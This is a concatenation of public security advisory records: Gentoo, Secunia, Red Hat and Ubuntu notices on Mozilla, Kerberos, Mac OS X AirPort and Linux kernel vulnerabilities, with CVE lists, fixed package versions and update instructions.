http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3993 [ 465 ] CVE-2012-3994 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3994 [ 466 ] CVE-2012-3995 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3995 [ 467 ] CVE-2012-4179 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4179 [ 468 ] CVE-2012-4180 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4180 [ 469 ] CVE-2012-4181 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4181 [ 470 ] CVE-2012-4182 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4182 [ 471 ] CVE-2012-4183 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4183 [ 472 ] CVE-2012-4184 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4184 [ 473 ] CVE-2012-4185 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4185 [ 474 ] CVE-2012-4186 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4186 [ 475 ] CVE-2012-4187 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4187 [ 476 ] CVE-2012-4188 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4188 [ 477 ] CVE-2012-4190 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4190 [ 478 ] CVE-2012-4191 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4191 [ 479 ] CVE-2012-4192 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4192 [ 480 ] CVE-2012-4193 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4193 [ 481 ] CVE-2012-4194 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4194 [ 482 ] CVE-2012-4195 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4195 [ 483 ] CVE-2012-4196 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4196 [ 484 ] CVE-2012-4201 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4201 [ 485 ] CVE-2012-4202 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4202 [ 486 ] CVE-2012-4204 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4204 [ 487 ] CVE-2012-4205 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4205 [ 488 ] CVE-2012-4206 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4206 [ 489 ] CVE-2012-4207 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4207 [ 490 ] CVE-2012-4208 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4208 [ 491 ] CVE-2012-4209 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4209 [ 492 ] CVE-2012-4210 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4210 [ 493 ] CVE-2012-4212 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4212 [ 494 ] CVE-2012-4215 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4215 [ 495 ] CVE-2012-4216 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4216 [ 496 ] CVE-2012-5354 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5354 [ 497 ] CVE-2012-5829 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5829 [ 498 ] CVE-2012-5830 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5830 [ 499 ] CVE-2012-5833 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5833 [ 500 ] CVE-2012-5835 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5835 [ 501 ] CVE-2012-5836 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5836 [ 502 ] CVE-2012-5838 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5838 [ 503 ] CVE-2012-5839 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5839 [ 504 ] CVE-2012-5840 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5840 [ 505 ] CVE-2012-5841 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5841 [ 506 ] CVE-2012-5842 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5842 [ 507 ] CVE-2012-5843 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5843 [ 508 ] Firefox Blocking Fraudulent Certificates http://blog.mozilla.org/security/2011/03/22/firefox-blocking-fraudulent-c= ertificates/ [ 509 ] Mozilla Foundation Security Advisory 2011-11 http://www.mozilla.org/security/announce/2011/mfsa2011-11.html [ 510 ] Mozilla Foundation Security Advisory 2011-34 http://www.mozilla.org/security/announce/2011/mfsa2011-34.html Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201301-01.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2013 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 . ---------------------------------------------------------------------- Secunia is hiring! http://secunia.com/company/jobs/ ---------------------------------------------------------------------- TITLE: SUSE update for MozillaFirefox, MozillaThunderbird, mozilla-xulrunner, and seamonkey SECUNIA ADVISORY ID: SA44472 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/44472/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=44472 RELEASE DATE: 2011-05-07 DISCUSS ADVISORY: http://secunia.com/advisories/44472/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/44472/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=44472 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: SUSE has issued an update for MozillaFirefox, MozillaThunderbird, mozilla-xulrunner, and seamonkey. For more information: SA44357 SA44406 SOLUTION: Apply updated packages via the zypper package manager. ORIGINAL ADVISORY: openSUSE-SU-2011:0437-1: http://lists.opensuse.org/opensuse-updates/2011-05/msg00005.html SUSE-SA:2011:022: http://lists.opensuse.org/opensuse-security-announce/2011-05/msg00001.html OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXPLOIT: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------
var-200704-0225 Buffer overflow in the AirPortDriver module for AirPort in Apple Mac OS X 10.3.9 through 10.4.9, when running on hardware with the original AirPort wireless card, allows local users to execute arbitrary code by "sending malformed control commands.". A vulnerability exists in the Kerberos administration daemon that may allow a remote, unauthenticated user to free uninitialized pointers. Freeing uninitialized pointers corrupts memory in a way that could allow an attacker to execute code. Apple Mac OS X is prone to multiple security vulnerabilities. These issues affect Mac OS X and various applications, including AFP Client, AirPortDriver module, CoreServices, Libinfo, Login Window, Natd, SMB, System Configuration, URLMount, VideoConference framework, WebDAV, and WebFoundation. Attackers may exploit these issues to execute arbitrary code, trigger denial-of-service conditions, escalate privileges, overwrite files, and access potentially sensitive information. Both local and remote vulnerabilities are present. Apple Mac OS X 10.4.9 and prior versions are vulnerable to these issues. A buffer overflow exists in the AirPortDriver module used to handle AirPort control commands. ---------------------------------------------------------------------- Secunia is proud to announce the availability of the Secunia Software Inspector. The Secunia Software Inspector is a free service that detects insecure versions of software that you may have installed in your system. When insecure versions are detected, the Secunia Software Inspector also provides thorough guidelines for updating the software to the latest secure version from the vendor. Try it out online: http://secunia.com/software_inspector/ ---------------------------------------------------------------------- TITLE: Gentoo update for mit-krb5 SECUNIA ADVISORY ID: SA23903 VERIFY ADVISORY: http://secunia.com/advisories/23903/ CRITICAL: Highly critical IMPACT: DoS, System access WHERE: >From remote OPERATING SYSTEM: Gentoo Linux 1.x http://secunia.com/product/339/ DESCRIPTION: Gentoo has issued an update for krb5. This fixes some vulnerabilities, which can potentially be exploited by malicious people to cause a DoS (Denial of Service) or compromise a vulnerable system. For more information: SA23690 SA23696 SOLUTION: Update to "app-crypt/mit-krb5-1.5.2" or later. ORIGINAL ADVISORY: http://www.gentoo.org/security/en/glsa/glsa-200701-21.xml OTHER REFERENCES: SA23690: http://secunia.com/advisories/23690/ SA235696: http://secunia.com/advisories/23696/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------
var-201911-1410 Two memory leaks in the mwifiex_pcie_init_evt_ring() function in drivers/net/wireless/marvell/mwifiex/pcie.c in the Linux kernel through 5.3.11 allow attackers to cause a denial of service (memory consumption) by triggering mwifiex_map_pci_memory() failures, aka CID-d10dcb615c8e. Linux Kernel Contains a resource exhaustion vulnerability. Vendors have confirmed this vulnerability CID-d10dcb615c8e It is released as.Service operation interruption (DoS) There is a possibility of being put into a state. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 ==================================================================== Red Hat Security Advisory Synopsis: Important: kernel security, bug fix, and enhancement update Advisory ID: RHSA-2020:1769-01 Product: Red Hat Enterprise Linux Advisory URL: https://access.redhat.com/errata/RHSA-2020:1769 Issue date: 2020-04-28 CVE Names: CVE-2018-16871 CVE-2019-8980 CVE-2019-10639 CVE-2019-15090 CVE-2019-15099 CVE-2019-15221 CVE-2019-17053 CVE-2019-17055 CVE-2019-18805 CVE-2019-19057 CVE-2019-19073 CVE-2019-19074 CVE-2019-19534 CVE-2019-19768 CVE-2019-19922 CVE-2020-1749 ==================================================================== 1. Summary: An update for kernel is now available for Red Hat Enterprise Linux 8. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. 2. Relevant releases/architectures: Red Hat CodeReady Linux Builder (v. 8) - aarch64, ppc64le, x86_64 Red Hat Enterprise Linux BaseOS (v. 8) - aarch64, noarch, ppc64le, s390x, x86_64 3. Security Fix(es): * kernel: use-after-free in __blk_add_trace in kernel/trace/blktrace.c (CVE-2019-19768) * kernel: nfs: NULL pointer dereference due to an anomalized NFS message sequence (CVE-2018-16871) * kernel: memory leak in the kernel_read_file function in fs/exec.c allows to cause a denial of service (CVE-2019-8980) * kernel: unprivileged users able to create RAW sockets in AF_IEEE802154 network protocol. (CVE-2019-17053) * kernel: unprivileged users able to create RAW sockets in AF_ISDN network protocol. (CVE-2019-17055) * kernel: integer overflow in tcp_ack_update_rtt in net/ipv4/tcp_input.c (CVE-2019-18805) * kernel: information leak bug caused by a malicious USB device in the drivers/net/can/usb/peak_usb/pcan_usb_core.c driver (CVE-2019-19534) * kernel: some ipv6 protocols not encrypted over ipsec tunnel. (CVE-2020-1749) * Kernel: net: using kernel space address bits to derive IP ID may potentially break KASLR (CVE-2019-10639) * kernel: An out-of-bounds read in drivers/scsi/qedi/qedi_dbg.c leading to crash or information disclosure (CVE-2019-15090) * kernel: a NULL pointer dereference in drivers/net/wireless/ath/ath10k/usb.c leads to a crash (CVE-2019-15099) * kernel: Null pointer dereference in the sound/usb/line6/pcm.c (CVE-2019-15221) * kernel: Two memory leaks in the mwifiex_pcie_init_evt_ring() function in drivers/net/wireless/marvell/mwifiex/pcie.c allows for a DoS (CVE-2019-19057) * kernel: Memory leaks in drivers/net/wireless/ath/ath9k/htc_hst.c in the Linux kernel (DOS) (CVE-2019-19073) * kernel: a memory leak in the ath9k management function in allows local DoS (CVE-2019-19074) * kernel: when cpu.cfs_quota_us is used allows attackers to cause a denial of service against non-cpu-bound applications (CVE-2019-19922) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Additional Changes: This update also fixes several bugs and adds various enhancements. Documentation for these changes is available from the Release Notes document linked to in the References section. 4. Solution: For details on how to apply this update, which includes the changes described in this advisory, refer to: https://access.redhat.com/articles/11258 The system must be rebooted for this update to take effect. 5. Bugs fixed (https://bugzilla.redhat.com/): 1655162 - CVE-2018-16871 kernel: nfs: NULL pointer dereference due to an anomalized NFS message sequence 1679972 - CVE-2019-8980 kernel: memory leak in the kernel_read_file function in fs/exec.c allows to cause a denial of service 1729933 - CVE-2019-10639 Kernel: net: using kernel space address bits to derive IP ID may potentially break KASLR 1738741 - L2 guest hit kernel panic when do L1->L1 live migration on PML-enabled intel host 1743526 - CVE-2019-15090 kernel: An out-of-bounds read in drivers/scsi/qedi/qedi_dbg.c leading to crash or information disclosure 1743560 - CVE-2019-15099 kernel: a NULL pointer dereference in drivers/net/wireless/ath/ath10k/usb.c leads to a crash 1749633 - kernel: brk can grow the heap into the area reserved for the stack 1749974 - CVE-2019-15221 kernel: Null pointer dereference in the sound/usb/line6/pcm.c 1752765 - conntrack tool delete entry with CIDR crash 1757902 - fix compat statfs64() returning EOVERFLOW for when _FILE_OFFSET_BITSd 1758242 - CVE-2019-17053 kernel: unprivileged users able to create RAW sockets in AF_IEEE802154 network protocol. 1758248 - CVE-2019-17055 kernel: unprivileged users able to create RAW sockets in AF_ISDN network protocol. 1765547 - Fallocate on XFS may discard concurrent AIO write 1767664 - Backport CIFS stale ESTALE handling and dentry revalidation patches 1771430 - svcrdma: Increase the default connection credit limit 1771496 - CVE-2019-18805 kernel: integer overflow in tcp_ack_update_rtt in net/ipv4/tcp_input.c 1771691 - Process killed while opening a file can result in leaked open handle on the server 1774933 - CVE-2019-19074 kernel: a memory leak in the ath9k management function in allows local DoS 1774937 - CVE-2019-19073 kernel: Memory leaks in drivers/net/wireless/ath/ath9k/htc_hst.c in the Linux kernel (DOS) 1775050 - CVE-2019-19057 kernel: Two memory leaks in the mwifiex_pcie_init_evt_ring() function in drivers/net/wireless/marvell/mwifiex/pcie.c allows for a DoS 1783540 - CVE-2019-19534 kernel: information leak bug caused by a malicious USB device in the drivers/net/can/usb/peak_usb/pcan_usb_core.c driver 1786164 - CVE-2019-19768 kernel: use-after-free in __blk_add_trace in kernel/trace/blktrace.c 1789594 - kernel: Wrong FE0/FE1 MSR restore in signal handlers on ppc64le 1792512 - CVE-2019-19922 kernel: when cpu.cfs_quota_us is used allows attackers to cause a denial of service against non-cpu-bound applications 1795049 - RHEL8: Latency issue on Kubernetes / k8s / OpenShift 1803162 - [NFS] Dataloss with copy_file_range on NFS-mounted files that is not 4K aligned on RHEL 8. 1809833 - CVE-2020-1749 kernel: some ipv6 protocols not encrypted over ipsec tunnel. 6. Package List: Red Hat Enterprise Linux BaseOS (v. 8): Source: kernel-4.18.0-193.el8.src.rpm aarch64: bpftool-4.18.0-193.el8.aarch64.rpm bpftool-debuginfo-4.18.0-193.el8.aarch64.rpm kernel-4.18.0-193.el8.aarch64.rpm kernel-core-4.18.0-193.el8.aarch64.rpm kernel-cross-headers-4.18.0-193.el8.aarch64.rpm kernel-debug-4.18.0-193.el8.aarch64.rpm kernel-debug-core-4.18.0-193.el8.aarch64.rpm kernel-debug-debuginfo-4.18.0-193.el8.aarch64.rpm kernel-debug-devel-4.18.0-193.el8.aarch64.rpm kernel-debug-modules-4.18.0-193.el8.aarch64.rpm kernel-debug-modules-extra-4.18.0-193.el8.aarch64.rpm kernel-debuginfo-4.18.0-193.el8.aarch64.rpm kernel-debuginfo-common-aarch64-4.18.0-193.el8.aarch64.rpm kernel-devel-4.18.0-193.el8.aarch64.rpm kernel-headers-4.18.0-193.el8.aarch64.rpm kernel-modules-4.18.0-193.el8.aarch64.rpm kernel-modules-extra-4.18.0-193.el8.aarch64.rpm kernel-tools-4.18.0-193.el8.aarch64.rpm kernel-tools-debuginfo-4.18.0-193.el8.aarch64.rpm kernel-tools-libs-4.18.0-193.el8.aarch64.rpm perf-4.18.0-193.el8.aarch64.rpm perf-debuginfo-4.18.0-193.el8.aarch64.rpm python3-perf-4.18.0-193.el8.aarch64.rpm python3-perf-debuginfo-4.18.0-193.el8.aarch64.rpm noarch: kernel-abi-whitelists-4.18.0-193.el8.noarch.rpm kernel-doc-4.18.0-193.el8.noarch.rpm ppc64le: bpftool-4.18.0-193.el8.ppc64le.rpm bpftool-debuginfo-4.18.0-193.el8.ppc64le.rpm kernel-4.18.0-193.el8.ppc64le.rpm kernel-core-4.18.0-193.el8.ppc64le.rpm kernel-cross-headers-4.18.0-193.el8.ppc64le.rpm kernel-debug-4.18.0-193.el8.ppc64le.rpm kernel-debug-core-4.18.0-193.el8.ppc64le.rpm kernel-debug-debuginfo-4.18.0-193.el8.ppc64le.rpm kernel-debug-devel-4.18.0-193.el8.ppc64le.rpm kernel-debug-modules-4.18.0-193.el8.ppc64le.rpm kernel-debug-modules-extra-4.18.0-193.el8.ppc64le.rpm kernel-debuginfo-4.18.0-193.el8.ppc64le.rpm kernel-debuginfo-common-ppc64le-4.18.0-193.el8.ppc64le.rpm kernel-devel-4.18.0-193.el8.ppc64le.rpm kernel-headers-4.18.0-193.el8.ppc64le.rpm kernel-modules-4.18.0-193.el8.ppc64le.rpm kernel-modules-extra-4.18.0-193.el8.ppc64le.rpm kernel-tools-4.18.0-193.el8.ppc64le.rpm kernel-tools-debuginfo-4.18.0-193.el8.ppc64le.rpm kernel-tools-libs-4.18.0-193.el8.ppc64le.rpm perf-4.18.0-193.el8.ppc64le.rpm perf-debuginfo-4.18.0-193.el8.ppc64le.rpm python3-perf-4.18.0-193.el8.ppc64le.rpm python3-perf-debuginfo-4.18.0-193.el8.ppc64le.rpm s390x: bpftool-4.18.0-193.el8.s390x.rpm bpftool-debuginfo-4.18.0-193.el8.s390x.rpm kernel-4.18.0-193.el8.s390x.rpm kernel-core-4.18.0-193.el8.s390x.rpm kernel-cross-headers-4.18.0-193.el8.s390x.rpm kernel-debug-4.18.0-193.el8.s390x.rpm kernel-debug-core-4.18.0-193.el8.s390x.rpm kernel-debug-debuginfo-4.18.0-193.el8.s390x.rpm kernel-debug-devel-4.18.0-193.el8.s390x.rpm kernel-debug-modules-4.18.0-193.el8.s390x.rpm kernel-debug-modules-extra-4.18.0-193.el8.s390x.rpm kernel-debuginfo-4.18.0-193.el8.s390x.rpm kernel-debuginfo-common-s390x-4.18.0-193.el8.s390x.rpm kernel-devel-4.18.0-193.el8.s390x.rpm kernel-headers-4.18.0-193.el8.s390x.rpm kernel-modules-4.18.0-193.el8.s390x.rpm kernel-modules-extra-4.18.0-193.el8.s390x.rpm kernel-tools-4.18.0-193.el8.s390x.rpm kernel-tools-debuginfo-4.18.0-193.el8.s390x.rpm kernel-zfcpdump-4.18.0-193.el8.s390x.rpm kernel-zfcpdump-core-4.18.0-193.el8.s390x.rpm kernel-zfcpdump-debuginfo-4.18.0-193.el8.s390x.rpm kernel-zfcpdump-devel-4.18.0-193.el8.s390x.rpm kernel-zfcpdump-modules-4.18.0-193.el8.s390x.rpm kernel-zfcpdump-modules-extra-4.18.0-193.el8.s390x.rpm perf-4.18.0-193.el8.s390x.rpm perf-debuginfo-4.18.0-193.el8.s390x.rpm python3-perf-4.18.0-193.el8.s390x.rpm python3-perf-debuginfo-4.18.0-193.el8.s390x.rpm x86_64: bpftool-4.18.0-193.el8.x86_64.rpm bpftool-debuginfo-4.18.0-193.el8.x86_64.rpm kernel-4.18.0-193.el8.x86_64.rpm kernel-core-4.18.0-193.el8.x86_64.rpm kernel-cross-headers-4.18.0-193.el8.x86_64.rpm kernel-debug-4.18.0-193.el8.x86_64.rpm kernel-debug-core-4.18.0-193.el8.x86_64.rpm kernel-debug-debuginfo-4.18.0-193.el8.x86_64.rpm kernel-debug-devel-4.18.0-193.el8.x86_64.rpm kernel-debug-modules-4.18.0-193.el8.x86_64.rpm kernel-debug-modules-extra-4.18.0-193.el8.x86_64.rpm kernel-debuginfo-4.18.0-193.el8.x86_64.rpm kernel-debuginfo-common-x86_64-4.18.0-193.el8.x86_64.rpm kernel-devel-4.18.0-193.el8.x86_64.rpm kernel-headers-4.18.0-193.el8.x86_64.rpm kernel-modules-4.18.0-193.el8.x86_64.rpm kernel-modules-extra-4.18.0-193.el8.x86_64.rpm kernel-tools-4.18.0-193.el8.x86_64.rpm kernel-tools-debuginfo-4.18.0-193.el8.x86_64.rpm kernel-tools-libs-4.18.0-193.el8.x86_64.rpm perf-4.18.0-193.el8.x86_64.rpm perf-debuginfo-4.18.0-193.el8.x86_64.rpm python3-perf-4.18.0-193.el8.x86_64.rpm python3-perf-debuginfo-4.18.0-193.el8.x86_64.rpm Red Hat CodeReady Linux Builder (v. 8): aarch64: bpftool-debuginfo-4.18.0-193.el8.aarch64.rpm kernel-debug-debuginfo-4.18.0-193.el8.aarch64.rpm kernel-debuginfo-4.18.0-193.el8.aarch64.rpm kernel-debuginfo-common-aarch64-4.18.0-193.el8.aarch64.rpm kernel-tools-debuginfo-4.18.0-193.el8.aarch64.rpm kernel-tools-libs-devel-4.18.0-193.el8.aarch64.rpm perf-debuginfo-4.18.0-193.el8.aarch64.rpm python3-perf-debuginfo-4.18.0-193.el8.aarch64.rpm ppc64le: bpftool-debuginfo-4.18.0-193.el8.ppc64le.rpm kernel-debug-debuginfo-4.18.0-193.el8.ppc64le.rpm kernel-debuginfo-4.18.0-193.el8.ppc64le.rpm kernel-debuginfo-common-ppc64le-4.18.0-193.el8.ppc64le.rpm kernel-tools-debuginfo-4.18.0-193.el8.ppc64le.rpm kernel-tools-libs-devel-4.18.0-193.el8.ppc64le.rpm perf-debuginfo-4.18.0-193.el8.ppc64le.rpm python3-perf-debuginfo-4.18.0-193.el8.ppc64le.rpm x86_64: bpftool-debuginfo-4.18.0-193.el8.x86_64.rpm kernel-debug-debuginfo-4.18.0-193.el8.x86_64.rpm kernel-debuginfo-4.18.0-193.el8.x86_64.rpm kernel-debuginfo-common-x86_64-4.18.0-193.el8.x86_64.rpm kernel-tools-debuginfo-4.18.0-193.el8.x86_64.rpm kernel-tools-libs-devel-4.18.0-193.el8.x86_64.rpm perf-debuginfo-4.18.0-193.el8.x86_64.rpm python3-perf-debuginfo-4.18.0-193.el8.x86_64.rpm These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/ 7. Contact: The Red Hat security contact is <secalert@redhat.com>. More contact details at https://access.redhat.com/security/team/contact/ Copyright 2020 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iQIVAwUBXqhVdNzjgjWX9erEAQhD/w//dPnDo2yo4d8QrzWDVVkXPNxRzhSCh7Rc vCtSYPB6YMydkKglUvdHS+ZGv+N/1xs8CTpAZ59q3NTiw2FdkCPfSuJiTwdCyOwc xars8lYLd2yKv/yhHXh5HDOloRRK26cKANvpUXFJCmbOq/muSEyhRTKKG2t+Iijn lMzS6BIheasfjupsy3K2JGeZCjKlH7u1yulJVH4BaQZ/K04NxKjOWGnZ9eAoP6gp AwPGT9YYT3Eg24NTaUVHBsrWMF7ybDkWuRav8TBHT8Uukoztjmypi/5C925tbVGM Ln36s+wfwPuytgos3JcjYVFhAzPwdtay99ZlXukeJlVXBc/AZEqkE3tp1dOUz5o/ QwjX2TByLMa6XAMWtNjW8AOcx30VuG73EoYNussB/J9+1eeehj7VpdAp/AWQm7q0 dHe0U6Pzm48vWLvuBzuc1JLC87ssbIC1n4WrfyUm86ECT8WZ4TsF8FZwlrzMB8Au wPMo9RHXb4gU9WgSfdikOvZy8DnyUfSIPnlyK71iaa7rqRlPVWM/XqDq7so7KF1o 3dE9bquitvi5H8/sEsgRGiqA6tb1Lh+mjhbE5FQxAggKnXz83UpJjk9aSL3dj+yY W1XxCp5lPPLclygA8lo7sqgD6RCBjWxzyGZBK0SoLzv2qHzrhxBeM0mOmhH7xRb5 N2G5/HRp5K8=0ugo -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . ========================================================================== Ubuntu Security Notice USN-4287-2 February 18, 2020 linux-azure vulnerabilities ========================================================================== A security issue affects these releases of Ubuntu and its derivatives: - Ubuntu 14.04 ESM Summary: Several security issues were fixed in the Linux kernel. Software Description: - linux-azure: Linux kernel for Microsoft Azure Cloud systems Details: USN-4287-1 fixed vulnerabilities in the Linux kernel for Ubuntu 18.04 LTS. This update provides the corresponding updates for the Linux kernel for Microsoft Azure Cloud systems for Ubuntu 14.04 ESM. It was discovered that the Linux kernel did not properly clear data structures on context switches for certain Intel graphics processors. A local attacker could use this to expose sensitive information. (CVE-2019-14615) It was discovered that the Atheros 802.11ac wireless USB device driver in the Linux kernel did not properly validate device metadata. A physically proximate attacker could use this to cause a denial of service (system crash). (CVE-2019-15099) It was discovered that the HSA Linux kernel driver for AMD GPU devices did not properly check for errors in certain situations, leading to a NULL pointer dereference. A local attacker could possibly use this to cause a denial of service. (CVE-2019-16229) It was discovered that the Marvell 8xxx Libertas WLAN device driver in the Linux kernel did not properly check for errors in certain situations, leading to a NULL pointer dereference. A local attacker could possibly use this to cause a denial of service. (CVE-2019-16232) It was discovered that a race condition existed in the Virtual Video Test Driver in the Linux kernel. An attacker with write access to /dev/video0 on a system with the vivid module loaded could possibly use this to gain administrative privileges. (CVE-2019-18683) It was discovered that the Renesas Digital Radio Interface (DRIF) driver in the Linux kernel did not properly initialize data. A local attacker could possibly use this to expose sensitive information (kernel memory). (CVE-2019-18786) It was discovered that the Afatech AF9005 DVB-T USB device driver in the Linux kernel did not properly deallocate memory in certain error conditions. (CVE-2019-18809) It was discovered that the btrfs file system in the Linux kernel did not properly validate metadata, leading to a NULL pointer dereference. An attacker could use this to specially craft a file system image that, when mounted, could cause a denial of service (system crash). (CVE-2019-19057) It was discovered that the crypto subsystem in the Linux kernel did not properly deallocate memory in certain error conditions. (CVE-2019-19062) It was discovered that the Realtek rtlwifi USB device driver in the Linux kernel did not properly deallocate memory in certain error conditions. (CVE-2019-19063) It was discovered that the RSI 91x WLAN device driver in the Linux kernel did not properly deallocate memory in certain error conditions. (CVE-2019-19071) It was discovered that the Atheros 802.11ac wireless USB device driver in the Linux kernel did not properly deallocate memory in certain error conditions. (CVE-2019-19078) It was discovered that the AMD GPU device drivers in the Linux kernel did not properly deallocate memory in certain error conditions. (CVE-2019-19082) Dan Carpenter discovered that the AppleTalk networking subsystem of the Linux kernel did not properly handle certain error conditions, leading to a NULL pointer dereference. A local attacker could use this to cause a denial of service (system crash). (CVE-2019-19227) It was discovered that the KVM hypervisor implementation in the Linux kernel did not properly handle ioctl requests to get emulated CPUID features. An attacker with access to /dev/kvm could use this to cause a denial of service (system crash). (CVE-2019-19332) It was discovered that the ext4 file system implementation in the Linux kernel did not properly handle certain conditions. An attacker could use this to specially craft an ext4 file system that, when mounted, could cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2019-19767) Gao Chuan discovered that the SAS Class driver in the Linux kernel contained a race condition that could lead to a NULL pointer dereference. A local attacker could possibly use this to cause a denial of service (system crash). (CVE-2019-19965) It was discovered that the Datagram Congestion Control Protocol (DCCP) implementation in the Linux kernel did not properly deallocate memory in certain error conditions. (CVE-2019-20096) Mitchell Frank discovered that the Wi-Fi implementation in the Linux kernel when used as an access point would send IAPP location updates for stations before client authentication had completed. A physically proximate attacker could use this to cause a denial of service. (CVE-2019-5108) It was discovered that a race condition can lead to a use-after-free while destroying GEM contexts in the i915 driver for the Linux kernel. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2020-7053) It was discovered that the B2C2 FlexCop USB device driver in the Linux kernel did not properly validate device metadata. A physically proximate attacker could use this to cause a denial of service (system crash). (CVE-2019-15291) Update instructions: The problem can be corrected by updating your system to the following package versions: Ubuntu 14.04 ESM: linux-image-4.15.0-1069-azure 4.15.0-1069.74~14.04.1 linux-image-azure 4.15.0.1069.55 After a standard system update you need to reboot your computer to make all the necessary changes. ATTENTION: Due to an unavoidable ABI change the kernel updates have been given a new version number, which requires you to recompile and reinstall all third party kernel modules you might have installed. Unless you manually uninstalled the standard kernel metapackages (e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual, linux-powerpc), a standard system upgrade will automatically perform this as well. References: https://usn.ubuntu.com/4287-2 